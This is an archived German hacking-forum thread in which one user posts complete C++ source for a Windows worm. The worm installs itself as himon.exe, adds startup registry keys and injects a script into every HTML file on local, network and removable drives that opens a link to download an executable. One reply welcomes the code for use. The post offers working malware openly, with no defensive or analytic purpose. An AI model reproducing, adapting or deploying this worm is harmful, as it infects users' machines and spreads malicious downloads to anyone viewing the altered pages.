Ergebnis 1 bis 3 von 3
  1. 20.10.2008, 14:46 #1
    VincentSX
    VincentSX ist offline
    NoClose Wurm Avatar von VincentSX
    Registriert seit
    19.09.2007
    Beiträge
    188

    Standard Win32.HTML Worm[WG]

    Code:
    HTML Worm
// Name: Win32.HTMLworm[WG Edit]
// Author: WarGame
// Compiler: Borland C++
// Description: This worm spreads by adding a link to itself in html files
// Improvements: You could add a link to a page containing an IE exploits :)

#include <windows.h>
#include <string>
using namespace std; // :)

// This function does the real work
void HTMLSpread(char *htmlfile)
{
  HANDLE html_fd;
  DWORD html_filesize,read_bytes,written_bytes;
  char *c_htmlcode = NULL;
  string *htmlcode = NULL; // make it simpler
  long pos;

  // open the html file
  html_fd = CreateFile(htmlfile,GENERIC_READ|GENERIC_WRITE,
            FILE_SHARE_READ|FILE_SHARE_WRITE,NULL,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,NULL);

  if(html_fd == INVALID_HANDLE_VALUE)
  {
      return;
  }

  // get file size
  html_filesize = GetFileSize(html_fd,NULL);

  // allocate enough memory
  c_htmlcode = (char *)malloc(html_filesize);

  if(c_htmlcode == NULL)
  {
      return;
  }

  // read entire file
  if(ReadFile(html_fd,c_htmlcode,html_filesize,&read_bytes,NULL) == 0)
  {
      CloseHandle(html_fd);
      return;
  }

  // create a string object
  htmlcode = new string(c_htmlcode);
  free(c_htmlcode);

  // already infected ?
  if(htmlcode->find("") == string::npos)
  {

  pos = htmlcode->find("</body>");

      if(pos == string::npos)
      {
        pos = htmlcode->find("</BODY>");

          if(pos == string::npos)
          {
            CloseHandle(html_fd);
            delete htmlcode;
            return;
          }
      }

  // add link
  htmlcode->replace(pos,7,"\r\n<script language=\"javascript\">window.open('http://website.com/artwork.exe')</script>\r\n</body>");

  // write new file
  SetFilePointer(html_fd,0,0,FILE_BEGIN);
  WriteFile(html_fd,htmlcode->c_str(),htmlcode->size(),&written_bytes,NULL);
  // infection mark
  WriteFile(html_fd,"",36,&written_bytes,NULL);

  }

  // close all
  CloseHandle(html_fd);
  delete htmlcode;

}

// add worm to startup list
void AutoStart(char *my_path)
{
    HKEY hkey;

     if(RegOpenKeyEx(HKEY_LOCAL_MACHINE,
         "Software\\Microsoft\\Windows\\CurrentVersion\\Run",0,
         KEY_WRITE,&hkey)==ERROR_SUCCESS)
     {
            RegSetValueEx(hkey,"himon",0,REG_SZ,my_path,strlen(my_path));
            RegCloseKey(hkey);
     }

     if(RegOpenKeyEx(HKEY_CURRENT_USER,
         "Software\\Microsoft\\Windows\\CurrentVersion\\Run",0,
         KEY_WRITE,&hkey)==ERROR_SUCCESS)
     {
            RegSetValueEx(hkey,"himon",0,REG_SZ,my_path,strlen(my_path));
            RegCloseKey(hkey);
     }
}

// This will scan drives for html files
void S3arch(char *pt) {
     char sc[MAX_PATH],buf[MAX_PATH];
     WIN32_FIND_DATA in;
     HANDLE fd,file;
     char *fm = "%s\\%s",*fm1 = "%s\\*.*";

     if(strlen(pt) == 3)
     {
        pt[2] = '\0'; /* :-) */
     }

     sprintf(sc,fm1,pt);
  fd = FindFirstFile(sc,&in);

do
{

     sprintf(buf,fm,pt,in.cFileName);

     /* dot :) */
     if(strcmp(in.cFileName,"..") != 0 && strcmp(in.cFileName,".") != 0 && (in.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY))
     {
         S3arch(buf);
     }

     /* File found */
     else
     {

         /* is it good to infect ? */

         if(strstr(in.cFileName,".html") || strstr(in.cFileName,".htm"))
         {
             HTMLSpread(buf);
         }
     

}while(FindNextFile(fd,&in));

FindClose(fd);
}


// entry point of worm
int WINAPI WinMain (HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow)
{
    // usual shit: installation part, startup and so on ...
    char I_am_here[MAX_PATH],installation_path[MAX_PATH];
    char Drives[3],Drive = 0;
    UINT drive_type;


    // only one copy
    CreateMutex(NULL,FALSE,"__HTMLworm_by_WarGame_EOF__");
    if(GetLastError() == ERROR_ALREADY_EXISTS)
    {
    ExitProcess;
    }

    GetSystemDirectory(installation_path,MAX_PATH);
    strcat(installation_path,"\\himon.exe");

    GetModuleFileName(NULL,I_am_here,MAX_PATH);
    // Copy!
    CopyFile(I_am_here,installation_path,FALSE);
    AutoStart(installation_path);


    // the real part starts here
    while(1)
    {

         /* Search for drives */
        for(Drive = 'C';Drive <= 'Z';Drive++)
        {
        Drives[0] = Drive;
        Drives[1] = ':';
        Drives[2] = '\\';
        Drives[3] = '\0';

        /* drive ? */
        drive_type = GetDriveType(Drives);

             /* only fixed, remote and removable drives */
           if(drive_type == DRIVE_FIXED ||
                drive_type == DRIVE_REMOTE ||
                  drive_type == DRIVE_REMOVABLE)
             {
                   /* GO! */
                 S3arch(Drives);
             }
        }

        /* every 10 minutes */
        Sleep((1000*60)*10);
    }
    -> mein Blog.: http://maymag.tk
    -- c0ding is passioN --
    Zitieren Zitieren
  2. 20.10.2008, 14:47 #2
    n1c3h4x0r!
    n1c3h4x0r! ist offline
    W32.Lovgate
    Registriert seit
    19.01.2008
    Beiträge
    340

    Standard

    wow thx
    woher hasten diesen code?

    den werden einige hier gebrauchen...

    Zitieren Zitieren
  3. 05.11.2008, 12:04 #3
    kInGoFcHaOs
    kInGoFcHaOs ist offline
    Linus Torvalds Avatar von kInGoFcHaOs
    Registriert seit
    25.11.2006
    Beiträge
    1.107

    Standard

    n1c3h4x0r! was is an dem so besonders?
    Zitieren Zitieren
« Vorheriges Thema | Nächstes Thema »

Stichworte

Berechtigungen

  • Neue Themen erstellen: Nein
  • Themen beantworten: Nein
  • Anhänge hochladen: Nein
  • Beiträge bearbeiten: Nein
  •  

Foren-Regeln